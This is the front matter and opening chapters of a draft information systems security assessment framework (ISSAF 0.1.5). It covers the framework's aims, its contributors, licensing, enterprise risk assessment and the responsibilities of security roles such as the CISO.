Information Systems Security Assessment Framework (ISSAF)

Draft 0.1.5
Author: Balwant Rathore

Key Contributors: Omar Herrera, Piero Brunati, Clement Dupuis, Rama K Subramaniam, Bob Johnston, Ross Patel, Umesh Chavan, Johnny Long, Miguel Dilaj, Dieter Sarrazyn, Jeremy Martin, Karmil Asgarally
TABLE OF CONTENTS
1 ABOUT ISSAF (page 3)
2 ASSESSMENT FRAMEWORK (page 21)
3 ENGAGEMENT MANAGEMENT (page 44)
4 BEST PRACTICES – PRE ASSESSMENT, ASSESSMENT AND POST ASSESSMENT (page 58)
5 ENTERPRISE SECURITY POLICY (page 95)
6 ENTERPRISE SECURITY ORGANIZATION & MANAGEMENT (page 108)
7 ASSESS ENTERPRISE SECURITY & CONTROLS (page 114)
  A PENETRATION TESTING - METHODOLOGY (page 115)
  B PENETRATION TESTING METHODOLOGY: DESCRIPTIVE – (CONTINUED) (page 125)
  C PASSWORD SECURITY (page 269)
  D PASSWORD CRACKING STRATEGIES (page 325)
  E UNIX/LINUX SYSTEM SECURITY ASSESSMENT (page 344)
  F WINDOWS SYSTEM SECURITY ASSESSMENT (page 387)
  G NOVELL NETWARE SECURITY ASSESSMENT (page 460)
  H DATABASE SECURITY ASSESSMENT (page 462)
  I WLAN SECURITY ASSESSMENT (page 515)
  J SWITCH SECURITY ASSESSMENT (page 538)
  K ROUTER SECURITY ASSESSMENT (page 573)
  L FIREWALL SECURITY ASSESSMENT (page 617)
  M INTRUSION DETECTION SYSTEM SECURITY ASSESSMENT (page 666)
  N VPN SECURITY ASSESSMENT (page 690)
  O ANTI-VIRUS SYSTEM SECURITY ASSESSMENT AND MANAGEMENT STRATEGY (page 700)
  P WEB APPLICATION SECURITY ASSESSMENT (page 716)
  Q WEB APPLICATION SECURITY (CONTINUED) – SQL INJECTIONS (page 774)
  R WEB APPLICATION SECURITY (CONTINUED) – WEB SERVER SECURITY ASSESSMENT (page 804)
  S STORAGE AREA NETWORK (SAN) SECURITY (page 816)
  T INTERNET USER SECURITY (page 826)
  U AS/400 SECURITY (page 832)
  V LOTUS NOTES SECURITY (page 860)
  W SOURCE CODE AUDITING (page 865)
  X BINARY AUDITING (page 866)
  Y APPLICATION SECURITY EVALUATION CHECKS (page 867)
8 SOCIAL ENGINEERING (page 871)
9 PHYSICAL SECURITY ASSESSMENT (page 898)
10 ENTERPRISE SECURITY OPERATIONS MANAGEMENT (page 906)
11 SECURITY AWARENESS AND TRAINING (page 929)
12 OUTSOURCING SECURITY CONCERNS (page 938)
13 BUSINESS CONTINUITY PLANNING AND DISASTER RECOVERY (page 939)
  BUSINESS CONTINUITY PLANNING (page 940)
  DISASTER RECOVERY PLANNING (page 943)
14 LEGAL AND REGULATORY COMPLIANCE (page 983)
15 INCIDENT ANALYSIS (page 986)
KNOWLEDGE BASE (page 996)
  1 BUILD FOUNDATION (page 997)
  2 DESKTOP SECURITY CHECK-LIST - WINDOWS (page 1031)
  3 LINUX SECURITY CHECK-LIST (page 1037)
  4 SOLARIS OPERATING SYSTEM SECURITY CHECK-LIST (page 1040)
  5 PENETRATION TESTING LAB DESIGN (page 1062)
  6 LINKS (page 1073)
  7 TEMPLATES / OTHERS (page 1102)
Page 2 of 1123
1 EXECUTIVE SUMMARY
Uncertainty abounds in today's economy. Every organization is, to some extent, in the
business of risk management, no matter what its products or services. It is not possible
to "create a business that doesn't take risks," according to Richard Boulton and
colleagues. "If you try, you will create a business that doesn't make money." As a
business continually changes, so do the risks. Stakeholders increasingly want
companies to identify and manage their business risks. More specifically, stakeholders
want management to meet their earnings goals. Risk management can help them do so.
According to Susan Stalnecker, vice president and treasurer of DuPont, "Risk
management is a strategic tool that can increase profitability and smooth earnings
volatility." Senior management must manage the ever-changing risks if they are to
create, protect, and enhance shareholder value.
-- Source: Excerpted from “Making Enterprise risk management pay off” by T.Barton et al
Risk management, despite its key role in formulating business priorities, is not usually a central activity within an organization. Today no organization that we know of has a Chief Risk Officer. It is expected that the CEO, the CFO or the CIO will handle risk as part of their portfolio of results. Loss avoidance is usually the priority when risk is handled in this manner. Addressing opportunities, however, requires more than loss avoidance: it has to address the uncertainties an organization has to deal with. And today no uncertainty is more certain than the fact that information technology can create risks that put an organization's reputation on the line and end up destroying critical assets that the business requires to manage day-to-day operations. To address this, information security has evolved into a body of knowledge with many different contributors providing vital insights into the benefits of information controls and technology standards. Unfortunately all of this activity has still not culminated in a unifying principle that would integrate the plenitude of options available today, including multiple standards, many control frameworks and divergent methodologies. Practitioners of information security as a profession are therefore still seeking a disciplined approach that could contextually place the available offerings and help them identify and apply the right answers to their most pressing concerns.
To understand this situation better, it is important to realize the nature of information itself and its role in enabling those seeking to manage business priorities. A business comes into existence to transform resources into results with the objective of exchanging these results for revenue. Information itself is derived from this transactional nature of business. Hence what is important to a business is not the data collected during transactions but how this data can be used to understand and manage business priorities, whether that is managing cash flow or fulfilling customer orders. Business transactions by their very nature are dependent on organizational infrastructure. Information is captured, processed and delivered using technology infrastructure in the form of systems and people. Internal processes combine these systems and people into the shared services that constitute front office and back office units, which have to work in concert to deliver the desired business results. As such, information and technology have a vital role to play in enabling cost-efficient, and increasingly time-efficient, business transaction processing. Any downtime caused by disruption of the underlying technology or processes, or by subversion of the information delivered by these technologies or processes, results in a cumulative impact that can lead to losses that are either critical or material to an organization. The losses are critical when the disruption leads to a loss of trust, among customers or other vital stakeholders, in the dependability of the business infrastructure, as this threatens the survival of the organization. They are material when the disruption leads to substantive losses caused by the dissolution of assets represented by accumulated transactional information, as substantial financial resources would be required to replace or repair these losses.
Before a company can manage its risks, it has to know what risks it has to manage. And to understand these risks, it is important to consider strategic business scenarios. For example, a key scenario for a CEO could be a question such as: what happens if we add a new business capability such as an e-Business portal? How it will impact our existing ability to deliver results is as important a consideration as the other side of the question, which is: what happens if we don't add the business capability? Will our customers shift to a competitor because they prefer the added value the new capabilities will bring to their transactions? It is in considering these scenarios that the relationship between risk and opportunity becomes clear to both the CEO, who has to drive the required organizational changes, and the IT division, which will be tasked with delivering the changes to systems that enable the organizational changes. Therefore both the leaders of an organization, who will create the driving vision, and the managers, who will implement the desired changes, need to meet on common ground. At OISSG we have chosen to focus on Enterprise Risk Management to facilitate IT as a business enabler in delivering new business capabilities. We have chosen to deliver this using a disciplined approach that step by step identifies and eliminates business inhibitors related to the risks that accrue from implementing information-related technologies.
This summarizes the vision that led to the development of ISSAF. We consider assessment as the unifying idea to integrate three separate but related sets of risk management activities, viz. interviewing, observation and testing. We have chosen assessment as a process instead of auditing because auditing would require an established body to promulgate the underlying standards. As an open source organization that has not sought such affiliations to date, we have not been restricted in choosing an approach that integrates exhaustive penetration testing with accepted business continuity practices and seeks to validate the alignment of business policies with internal IT realities. All of this is delivered through a step-by-step engagement management approach to facilitate the assessment process within an organization seeking to secure its information assets.
I think the point to risk management is not to try and operate your business in a risk-free
environment. It's to tip the scale to your advantage. So it becomes strategic rather than
just defensive.
—Peter G. M. Cox, CFO, United Grain Growers Ltd.
2 ABOUT ISSAF
2.1 PREFACE
Today, the evaluation of Information Systems (IS) security in accordance with business requirements is a vital component of any organization's business strategy. While there are a few information security assessment standards, methodologies and frameworks that talk about what areas of security must be considered, they do not contain specifics on HOW and WHY existing security measures should be assessed, nor do they recommend controls to safeguard them.
The Information System Security Assessment Framework (ISSAF) is a peer-reviewed, structured framework that categorizes information system security assessment into various domains and details specific evaluation or testing criteria for each of these domains. It aims to provide field inputs on security assessment that reflect real-life scenarios. ISSAF should primarily be used to fulfil an organization's security assessment requirements and may additionally be used as a reference for meeting other information security needs. ISSAF includes the crucial facet of security processes and their assessment and hardening, to get a complete picture of the vulnerabilities that might exist.
The information in ISSAF is organized into well-defined evaluation criteria, each of which has been reviewed by subject matter experts in that domain. Each evaluation criterion includes:
• A description of the evaluation criteria
• Its aims and objectives
• The pre-requisites for conducting the evaluation
• The process for the evaluation
• The expected results
• Recommended countermeasures
• References to external documents
The overall framework is large; we chose to provide as much information as possible on the assumption that it would be easier for users to delete material than to develop it. The Information System Security Assessment Framework (ISSAF) is an evolving document that will be expanded, amended and updated in future.
2.1.1 What are the Objectives of ISSAF?
• To act as an end-to-end reference document for security assessment
• To standardize the Information System Security Assessment process
• To set the minimal level of acceptable process
• To provide a baseline on which an assessment can (or should) be performed
• To assess safeguards deployed against unauthorized access
• To act as a reference for information security implementation
• To strengthen existing security processes and technology
2.1.2 What are the Goals of ISSAF?
The goal of the ISSAF is to provide a single point of reference for security assessment. It is a reference that is closely aligned with real-world security assessment issues and that is a value proposition for businesses. To this aim the ISSAF has the following high-level agenda:
• Evaluate the organization's information security policies and ensure that they meet industry requirements and do not violate any applicable laws and regulations
• Identify the critical information systems infrastructure required for the organization's business processes and evaluate its security
• Conduct vulnerability assessments and penetration tests to highlight system vulnerabilities, thereby identifying weaknesses in systems, networks and applications
• Evaluate controls applied to various security domains by:
  o Finding mis-configurations and rectifying them
  o Identifying known and unknown risks related to technologies and addressing them
  o Identifying known and unknown risks within your people or business processes and addressing them
  o Strengthening existing processes and technologies
• Prioritize assessment activities as per system criticality, testing expenses and expected benefits
• Educate people on performing security assessments
• Educate people on securing systems, networks and applications
• Provide information on:
  o The review of logging, monitoring and auditing processes
  o The building and review of the Disaster Recovery Plan
  o The review of outsourcing security concerns
• Compliance with legal and regulatory standards
• Create security awareness
• Effective management of security assessment projects
• Guarding against social engineering exploitation
• Physical security control review
This approach is based on using the shortest path required to achieve one's goal, by finding flaws that can be exploited efficiently and with minimal effort. The goal of this framework is to bring completeness, accuracy and efficiency to security assessments.
2.1.3 Why did we come up with ISSAF?
After working on many information assurance projects, we felt the lack of a comprehensive framework that provides information security assurance through standardized vulnerability assessment, penetration testing, security assessment and security audit.
ISSAF is a comprehensive and in-depth framework that helps avoid the risk inherent in narrow or ineffective security assessment methodologies. In ISSAF we have tried to define an information system security assessment methodology that is more comprehensive than other assessment frameworks; it seeks to mitigate the inherent risk in the security assessment process itself. It helps us understand the business risks that we face in performing our daily operations. The threats, vulnerabilities and potential exposures that affect our organizations are too great to be ignored.
At this particular time it is not the answer to every question or situation, but we are committed to continuous improvement by improving current topics and adding new topics.
ISSAF has laid the foundation; now it is your turn to benefit from it, whether you use it as is or tailor the materials to suit your organization's needs. Welcome to ISSAF; we hope you will find it useful.
2.2 TARGET AUDIENCE
This framework is aimed at a wide spectrum of audiences that include:
• Internal and external vulnerability assessors, penetration testers, security auditors and security assessors
• Professionals responsible for information security and perimeter security
• Security engineers and consultants
• Security assessment project managers
• Information system staff responsible for information security
• System/network/Web administrators
• Technical and functional managers
2.3 CONTRIBUTORS
2.3.1 Contributor Contacts and References
-Ascending order by Name
2.3.2 Contributors as per Domain
Domain
Project Management
Author[s]
S.Saravanan and Balwant
Rathore
Best Practices – PreAssessment, Assessment, Post
Balwant Rathore
Assessment
Evaluation of Third Party
Contracts
Assessment Framework
Contributor[s]
Viraf Hathiram
S.Saravanan
Omar Herrera
Dieter Sarrazyn
Balwant Rathore
Balwant Rathore
Umesh Chavan
Johnny Long
Gareth Davies
Technical Control Assessment
Methodology
Balwant Rathore
Pukhraj Singh
Param Singh
Dieter Sarrazyn
Kartikeya Puri
Review Information Security
Policy And Security
Umesh Chavan
R.S. Sundar
Organization
Review Risk Assessment And
Umesh Chavan
Classification
Balwant Rathore
Password Security
Miguel Dilaj
Major Gajendra Singh
Bernardo Reino aka lepton
Piero Brunati
Matteo Brunati
Password Cracking Strategies
Unix /Linux System Security
Assessment
Pietro Brunati
Miguel Dilaj
Arturo "Buanzo" Busleiman
Balwant Rathore
Kartikeya Puri
Jayesh Thakur
Linux Audit Check-List
Hiten Desai
Linux Audit Tool
Hiten Desai
Solaris Audit Check-List
Jayesh Thakur
Solaris Audit Tool
Vijay Ganpathy
Windows System Security
Bernardo Reino aka lepton
Balwant Rathore
Arturo "Buanzo" Busleiman
Dieter Sarrazyn
R.S. Sundar
Kartikeya Puri
Assessment
Windows Security Audit Tool
Desktop Security Checklist -
Oscar Marin
Dieter Sarrazyn
Umesh Chavan
Balwant Rathore
Balwant Rathore
Kartikeya Puri
Database Security Assessment
K. K. Mookhey
Balwant Rathore
Wireless Security Assessment
Balwant Rathore
Windows
Novell Netware Security
Assessment
Wi-fi Security Assessment
Physical Security Assessment
J Sheik Abdulla
Anish Mohammed
Balwant Rathore
Balwant Rathore
Umesh Chavan
Switch Security Assessment
Balwant Rathore
Cesar Tascon
Router Security Assessment
Balwant Rathore
Manish Uboveja
Firewall Security Assessment
Balwant Rathore
Dieter Sarrazyn
Default Ports – Firewall
Intrusion Detection System
Security Assessment
Default Ports – IDS/IPS
VPN Security Assessment
Anti-Virus System Security
Assessment And Management
Strategy
Web Application Security
Web Application Security –
SQL Injections
Vinay Tiwari
Balwant Rathore
Balwant Rathore
Umesh Chavan
Miguel Dilaj
Balwant Rathore
Hemil Shah
Balwant Rathore
Hernan Marcelo Racciatti
Disaster Recovery Planning
Rishi Pande
Balwant Rathore
IIS Audit Check-List
And Disaster Recovery
Dragos
Gabrial O. Zabal
Balwant Rathore
Business Continuity Planning
Oliver Karow
Vinary Tiwari
Web Server Security
Binary Auditing
Dieter Sarrazyn
Hernan Marcelo Racciatti
Rahul
Balwant Rathore
R.S. Sundar
Kalpesh Doshi
Balwant Rathore
Social Engineering
Umesh Chavan
Dragos
Incident Analysis
Muhammad Faisal Rauf Danka
Storage Area Network (SAN)
Balwant Rathore
Security
Hari Prasad Chede
Internet User Security
Balwant Rathore
Review Of Logging / Monitoring
R.S. Sundar
& Auditing Processes
Umesh Chavan
Assess Outsourcing Security
Concerns
Security Awareness And
Training
Balwant Rathore
Kartikeya Puri
Thanzeer
Umesh Chavan
R.S.Sundar
Salman Ashraf
Patrick
Balwant Rathore
Knowledge Base
Legal Aspects Of Security
Balwant Rathore
Assessment Projects
Sandhya Khamesra
Dos Attacks: Instigation And
Mitigation
Jeremy Martin
Virus & Worms
Jeremy Martin
Cryptography
Jeremy Martin
Non-Disclosure Agreement
(NDA)
Balwant Rathore
Security Assessment
Balwant Rathore
Contract
Sandhya Khamesra
Request For Proposal
Template
Vulnerability Assessment /
Penetration Testing Lab
Links
Report Template
Balwant Rathore
Hamid kashfi
Balwant Rathore
Marko
Marko Ruotsalainen
Balwant Rathore
Umesh Chavan
2.3.3 Key Contributors Introduction
Omar Herrera
Clement Dupuis
Bob Johnston
Jeremy Martin
Rama K Subramaniam
Ross Patel
Johnny Long
Karmil Asgarally
Umesh Chavan
Umesh Chavan is an information security professional with over 7 years of experience and holds a CISSP. He is currently working with CoreObjects, India, where he is involved in the development of security products. Prior to this he worked with JP Morgan Chase as an Information Risk Manager and as an Information Security Specialist with Larsen & Toubro Infotech Ltd. He has exposure to the various domains in security and has a unique blend of both process and technical knowledge. He likes conversing with people, sharing new ideas and enriching his knowledge, not necessarily restricted to the field of information security.
Miguel Dilaj
Born in 1971. Started using computers in 1982 (venerable C64). Migrated to Amiga in the late '80s (still have and regularly use a PowerPC Amiga). Became involved with PC and AS/400 in the '90s. First serious use of Linux in 1998 (RedHat 5.1); tried FreeBSD, NetBSD and OpenBSD and fell back to Linux, having tried RedHat-based, Slackware-based and Debian-based distros. Currently using Debian-based distros, with continuous Windows use from 3.0 up to XP Pro. Became deeply involved in IT security in '98, when it started to be possible to have real control of the situation (i.e. Linux!). Started training other people in Linux and IT security in 2000; currently working in the Quality Assurance and Automation fields (Computerized System Validation). Interested in clusters and their use for password auditing.
Piero Brunati
Co-founder of Nest (www.nestonline.com), where he performs research and ethical hacking and develops software; he tries hard to mitigate customers' nightmares. He has been butchering computers since the good old '70s, when he spent his first salary on the components he used to solder his first computer (8008 CPU, 2k static RAM, 2k EPROM, serial and parallel I/O).
K. K. Mookhey
K. K. Mookhey is the Founder and Chief Technology Officer of Network Intelligence (www.nii.co.in), an information security consulting firm. He has provided security consulting services to Fortune 500 companies and industry segment leaders in India, the Middle East and North America. He has pioneered the development of the AuditPro suite of security auditing software, as well as initiated the research efforts within the company. His vulnerability research team has found security vulnerabilities in products from vendors such as Oracle, Symantec and Macromedia. He is a regular contributor to the Infocus series of articles on SecurityFocus, as well as various industry journals such as IS Control and IT Audit. He is the author of a monograph on "Linux Security Audit and Controls" commissioned by the Information Systems Audit and Control Association (ISACA). He is also the author of the chapter on "Web Application Attacks" in the upcoming version of the OWASP Guide.
Dieter Sarrazyn
Dieter Sarrazyn has been an information security consultant and trainer for more than 6 years now.
Dieter is a certified and experienced professional in the areas of creating secure information systems and network architectures, performing security audits of systems and network infrastructures, performing penetration tests, and installing and configuring firewall and VPN solutions. Other expertise lies in the areas of system and network management, installing and configuring antivirus solutions, and installing and configuring mail relay systems.
Dieter first worked as a Security Engineer in a network integration company and then moved towards security consulting at the company he is still working for. His main tasks are performing penetration testing, security auditing and teaching the Hacking Inside Out course. He is also a Local Mentor for SANS tracks 1 and 4.
Dieter has earned the following certifications: CISSP, GSEC, GCIH, CCSA and CCSE.
2.4 DOCUMENT ORGANIZATION AND CONVENTIONS
2.4.1 Document Organization
This framework briefly discusses the requirements for security assessments and explains in detail the methodology of security assessments. The sections are organized as follows:
1. Project Management
2. Guidelines And Best Practices – Pre Assessment, Assessment And Post Assessment
3. Assessment Methodology
4. Review Of Information Security Policy And Security Organization
5. Evaluation Of Risk Assessment Methodology
6. Technical Control Assessment
   • Technical Control Assessment - Methodology
   • Password Security
   • Password Cracking Strategies
   • Unix/Linux System Security Assessment
   • Windows System Security Assessment
   • Novell Netware Security Assessment
   • Database Security Assessment
   • Wireless Security Assessment
   • Switch Security Assessment
   • Router Security Assessment
   • Firewall Security Assessment
   • Intrusion Detection System Security Assessment
   • VPN Security Assessment
   • Anti-Virus System Security Assessment And Management Strategy
   • Web Application Security Assessment
   • Storage Area Network (SAN) Security
   • Internet User Security
   • AS/400 Security
   • Source Code Auditing
   • Binary Auditing
7. Social Engineering
8. Physical Security Assessment
9. Incident Analysis
10. Review Of Logging / Monitoring & Auditing Processes
11. Business Continuity Planning And Disaster Recovery
12. Security Awareness And Training
13. Outsourcing Security Concerns
14. Knowledge Base
   • Legal Aspects Of Security Assessment Projects
   • Non-Disclosure Agreement (NDA)
   • Security Assessment Contract
   • Request For Proposal Template
   • Desktop Security Check-List - Windows
   • Linux Security Check-List
   • Solaris Operating System Security Check-List
   • Default Ports - Firewall
   • Default Ports – IDS/IPS
   • Links
   • Penetration Testing Lab Design
2.4.2 Document Convention
In many places in this document we use the following test case template:

Heading of Topic
  Introduction (description / purpose / requirement / terminology / history)
  Objective
  Expected Results
  Methodology (structured steps that need to be followed to complete the test case)
    Per Test / Technique
      Description
      Objective
      Expected Result
      Pre-requisite
      Process (steps to complete this task)
        [Description]
        [Example/Results]
        [Countermeasure]
      Example/Results of common testing tool(s)
      Countermeasure(s)
      Further Reading(s)
      Contributor(s)
  Global Comments
  Global Countermeasure(s)
  Contributor(s)
  Further Reading(s)
2.5 DISCLAIMER
While all possible precautions have been taken to ensure accuracy during the development of the Information System Security Assessment Framework (ISSAF), also referred to as ISSAF, the Open Information System Security Group (OISSG) assumes no responsibility for any damages, errors or downtime resulting from or caused by the use of the information contained herein.
OISSG does not warrant or assume any legal liability or responsibility for the completeness, usefulness or accuracy of the information presented in this document. OISSG will not be responsible for any damage, malfunction, downtime or other errors that might result from the usage of this document.
2.6 LICENSING
• We impose no restrictions on any individual/organization practicing the ISSAF.
• Any individual/organization will be granted unlimited distribution of the ISSAF provided the copyright is included in the document and the authors' name[s] are maintained in the document after the final release of ISSAF. This release is a draft, and to distribute it one needs to obtain permission from OISSG.
• We impose no restrictions on any individual/organization developing products based on it.
• Written authorization is required from OISSG for any individual or organization that provides training based on ISSAF and/or wants to use ISSAF material for commercial training purposes.
• Generally, tools developed for ISSAF assessment are released under the GNU GPL (http://www.opensource.org/licenses/gpl-license.html).
• OISSG reserves the right to change the licensing policy at its own discretion.
Do reach us for more detail on our licensing at licensing@oissg.org
3 ASSESSMENT FRAMEWORK
INTRODUCTION
The Security Assessment Framework provides a holistic approach to assessing information security risks to an enterprise. The framework advocates approaching information security risk assessments from the perspective of the enterprise's business objectives and associated risks. This ensures the alignment of the enterprise's business risks with the risks arising from the nature and extent of its use of Information Technology to achieve its business objectives.
[Figure: Enterprise Security Assessment Framework. The diagram shows the assessment stages in sequence: Identify Gross Risk; Evaluate Enterprise Information Security Policy; Evaluate Enterprise Information Security Organization & Management; Assess Enterprise Security & Controls; Evaluate Enterprise Security Operations Management; Assess Business Continuity and Disaster Recovery Planning; Evaluate Legal and Regulatory Compliance; Manage Residual Risks. Beneath the Assess Enterprise Security & Controls and Evaluate Enterprise Security Operations Management stages the diagram also lists: Physical and Environmental Security, Technical Controls Assessment, Secure Application Development, Security Awareness, Capacity Management, Vulnerability Management, Patch Management, Release Management, Configuration Management, Enterprise Incident Management, Change Management, Security Awareness Program.]
Identify Gross Risk
The framework commences with an Enterprise Risk Assessment of the business which
helps identify the gross risk to the business as a whole. This provides focus to the
nature of risks being considered for the assessment of Information Security. The gross
risks identified during the assessment are further used to identify specific risks that stem
from the nature and extent of usage of Information Technology in the enterprise. The
identified Information Technology risks are then used to formulate the security and
control requirements of the enterprise.
Given the costs of implementing and maintaining security and controls in the Information
Technology environment, an enterprise would consider the cost benefit of any security
implementation by measuring the cost of control against the impact of not having such a
control. In instances where the cost of control exceeds the impact of the risk both in
terms of effort and value, the enterprise may choose not to implement such security or
control mechanisms. Alternatively, the insignificance of the impact of risks may also
prompt an enterprise not to implement any specific controls to mitigate these risks. Such
risks are considered as ‘Residual Risks’ (refer 3.8 Residual Risk Management) in the Security Assessment Framework.
The gross risks identified as applicable to the Information Technology implemented within an organization are then evaluated to identify the extent of the threats and the probability of occurrence of such threats. Based on a ranking of the threats, the probability of their occurrence and the impact of the risks to the business, the basis for the assessment of Enterprise Security is formulated.
Evaluate Enterprise Information Security Policy
Upon commencing an Enterprise Security Assessment, one of the first tasks would be to understand and evaluate the Information Security Policy of the enterprise. The Information Security Policy is a reflection of the management’s intent and approach to Information Security and epitomizes the extent and the nature of Information Security implemented within the Enterprise. A review of the enterprise’s Information Security Policy is necessary to gain a comprehensive understanding of the approach to implementing and maintaining the Information Security posture of the organization.
Evaluate Information Security Organization and Management
Subsequent to the Enterprise Risk Assessment and the review of the Information Security Policy, a review of the Information Security Organization and Management is performed. This comprises a review of the organization of the security functions, relevant roles and responsibilities and management responsibilities, amongst other areas.
Having obtained an understanding of the risks applicable to the technology infrastructure of the enterprise, the enterprise’s approach to managing security as stated in its Information Security policy, and the allocation of security roles and responsibilities, it would be logical to assess the specific security infrastructure and operational controls implemented within the enterprise to mitigate the identified Information Technology risks. This stage of the Security Risk Assessment Framework comprises the following:
• Enterprise Security and Controls Assessment
• Operations Management Assessment
Assess Enterprise IS Security and Controls
This stage comprises a review of the following:
• Physical and Environmental Security
• Technical Controls Assessment
  - Technical Controls Assessment Methodology
  - Database security
  - Host Security
  - Application Security and Controls
  - Network Security
• Secure Application Development Process
• Security Awareness
  - Review of Security Awareness Program (SAP)
  - Interviews
  - Observation
  - Structured walk through
  - Social Engineering
Evaluate Security Operations Management
This review is performed in conjunction with the Enterprise Security and Controls Assessment, to gain an understanding of the risks and controls of the security operations processes. This would comprise an assessment of the following operational areas:
• Capacity Management
• Vulnerability Management
• Release Management
  - Patch Management
  - Configuration Management
  - Change Management
• Enterprise Incident Management
  - Logging
  - Monitoring
  - Security Incident Management
  - Operation Event Management
• User Management
• Certification and Accreditation
Assess Business Continuity and Disaster Recovery Planning
A review of the Disaster Recovery capabilities of the enterprise is essential to assess the adequacy of the readiness of the enterprise in ensuring availability of the Information Technology infrastructure. This review is complemented with a review of the Business Continuity processes of the enterprise to ensure that in the event of a disaster the enterprise is adequately prepared to continue business operations until normal operations are completely restored.
Evaluate Legal and Regulatory Compliance
A review of the legal and regulatory requirements impacting the enterprise is essential to ensure that the enterprise is compliant with any laws or regulations that are applicable to the Information Technology infrastructure of the enterprise.
Manage Residual Risks
As stated earlier, the risks not covered by the enterprise’s security and controls implementations are categorized as Residual Risks. Given the volatile nature of business in general and the ever-changing risks applicable to the industry and information technology, it is important to constantly review the residual risks not addressed by an enterprise’s Information Security Management Framework. This is required to ensure that risks that were previously categorized as residual are appropriately escalated and managed as their relevance and importance to the enterprise change.
A review of the process for management of Residual Risks is performed to ensure that residual risks are continuously reviewed and reassessed, to confirm that their criticality has not changed and that the need for controls or security implementations in these areas has not increased.
3.1 IDENTIFY PERTINENT (GROSS) RISK
The objective of identifying Gross Risk is to establish the risk environment impacting the organization. The risks identified during this stage of the assessment would largely reflect the high-level business risks impacting the enterprise’s business objectives.
Why perform a risk assessment of the business objectives of the business? This is a question that is often considered by information security practitioners. It is true that business risks envisaged by the senior management have no bearing on the applicable technology risks; however, all technology risks translate into a certain form of business risk that impedes the achievement of the enterprise’s business goals. The two are certainly related and stem from each other (refer Figure 1: Enterprise & Technology Risk Relationships). The reason an approach from the business angle is prescribed in this framework is to ensure that the objectives of Information Security Management are aligned to the Risk Management objectives of the enterprise as a whole.
Figure 1: Enterprise & Technology Risk Relationships
This provides focus to the nature of risks being considered for the assessment of Information Security. The gross risks identified during the assessment are further used to identify specific risks impacting the information used by the enterprise for its business operations and stemming from the nature and extent of usage of Information Technology in the enterprise. The identified Information Technology risks are then used to formulate and review the security and control requirements of the enterprise.
The Enterprise Risk Assessment Methodology is detailed in the ISSAF’s Enterprise Risk Assessment document.
3.2 EVALUATE ENTERPRISE INFORMATION SECURITY POLICY
The objective of evaluating the enterprise information security policy is to determine whether the enterprise’s policies cover the appropriate areas of concern to the enterprise regarding information security. An evaluation will generally include discussion with management, a review of the policies to evaluate the areas covered, and identification of appropriate approval by management.
3.2.1 Information Security Policy Review
3.2.1.1 FORMALIZED SECURITY POLICY, PROCEDURES, STANDARDS & GUIDELINES
3.2.1.2 SECURITY POLICY MAINTENANCE
3.3 REVIEW OF ENTERPRISE SECURITY ORGANIZATION AND MANAGEMENT
3.3.1 Senior Management
The Senior Management, comprising the senior-most management team members of the enterprise, provides the necessary commitment and support for the management of the enterprise’s Information Security initiatives. This is to ensure that the relevance and importance of Information Security is adequately communicated, understood and diligently implemented and adhered to by the personnel of the enterprise.
3.3.2 Information Security Forum
The Information Security Forum of the enterprise is an active representative of the senior management and comprises key operational management personnel with sufficient authority for decision making. The Information Security Forum is responsible for:
• The approval of Information Security Policies, Procedures and Minimum Baseline Standards for configurations
• The roles and responsibilities of each Information Security Organization team member
• The approval of disciplinary actions in respect of Information Security incidents
• The review, monitoring and approval of all Information Security related implementation initiatives
3.3.3 Security Organization
The Security Organization of the enterprise is the active arm of the Information Security Forum that is responsible for the implementation of the Information Security initiatives of the organization. The specific structure, roles and responsibilities of the security organization may differ from enterprise to enterprise depending on the size and infrastructural complexities of the IT infrastructure of the enterprise. The following sections provide some of the commonly found roles along with indicative responsibilities of these roles.
3.3.4 Information Security Roles and Responsibilities
The effectiveness of any Information Security Management framework is dependent on
the personnel who administer the security implementation. This would depend on how
effectively the enterprise assigns and manages the roles and responsibilities for the
implementation and management of Information Security.
The assessment of an Information Security Framework would also comprise a review of the specific roles and responsibilities allocated to specific groups or individual personnel of an enterprise. Some of the key roles are listed below along with the specific responsibilities that would ideally be allocated to such roles.
3.3.5 Chief Information Security Officer
The Chief Information Security Officer (CISO) is the senior-most position in a security management organization within an enterprise. The CISO’s role will at a minimum include the following responsibilities:
• Identification of the strategic direction of Information Security within the enterprise
• Ensuring alignment of information security objectives with the strategic IT plan and the strategic business objectives of the enterprise
• Ensuring alignment of the security management objectives with the risk management objectives of the enterprise
• Ensuring the alignment of the information risk management framework with the risk management framework of the enterprise
• Ensuring that an appropriate security management organization and infrastructure is implemented in the enterprise so that the information risks of the enterprise are appropriately managed
• Ensuring the effectiveness of the information risk identification and management process of the enterprise
3.3.5.1 PHYSICAL SECURITY MANAGER
The Physical Security Manager’s role is responsible for the management of the security of the physical facilities related to Information Technology implemented within an organization. Such responsibilities will at a minimum include the following:
• Implementation and management of physical access controls at each of the facilities of the enterprise
• Implementing and sustaining suitable environmental controls to ensure that an appropriate environment is provided for the infrastructure of the enterprise
• Ensuring the upkeep of the facilities in accordance with any enterprise facilities management policies or applicable best practices
3.3.5.2 INFRASTRUCTURE SECURITY MANAGER
The Infrastructure Security Manager’s role is responsible for the management of security of specific infrastructure components of the IS infrastructure of the enterprise. This would include:
• Implementation and management of logical security of infrastructure components comprising the following:
  - All hardware
  - All security infrastructure devices/components
• Coordination with the Network and Application / Database Security Managers for configuration management
• Maintenance and management of the configuration of the components
• Implementation of the Information Security Policies, Procedures and Minimum Baseline Standards for configurations
• Conduct of periodic reviews of the security configurations of the components
• Appropriate application of the change management processes for management of patches, upgrades, installation and maintenance activities pertaining to the specific components under his control
3.3.5.3 NETWORK SECURITY MANAGER
The Network Security Manager’s role is responsible for the management of security of specific network and telecommunication components of the IS infrastructure of the enterprise. This would include:
• Implementation and management of security of network and telecommunication components comprising the following:
  - Routers
  - Bridges / Switches
  - Network Cabling
  - ISP connectivity
  - Enterprise sites connectivity
  - Other network components as applicable
• Maintenance and management of the configuration of the components
• Implementation of the Information Security Policies, Procedures and Minimum Baseline Standards for configurations
• Conduct of periodic reviews of the security configurations of the components
• Appropriate application of the change management processes for management of patches, upgrades, installation and maintenance activities pertaining to the specific components under his control
3.3.5.4 APPLICATIONS & DATABASE SECURITY MANAGER
The Application and Database Security Manager’s role is responsible for the implementation and management of application security and logical security of both applications and databases of the Information Systems used within the Enterprise. The specific responsibilities would include the following:
• Maintenance and management of the configuration of the applications and databases
• Implementation of the Information Security Policies, Procedures and Minimum Baseline Standards for configurations
• Conduct of periodic reviews of the configurations of the applications and databases
• Appropriate application of the change management processes for management of patches, upgrades, installation and maintenance activities
• Management of user access to the applications and databases
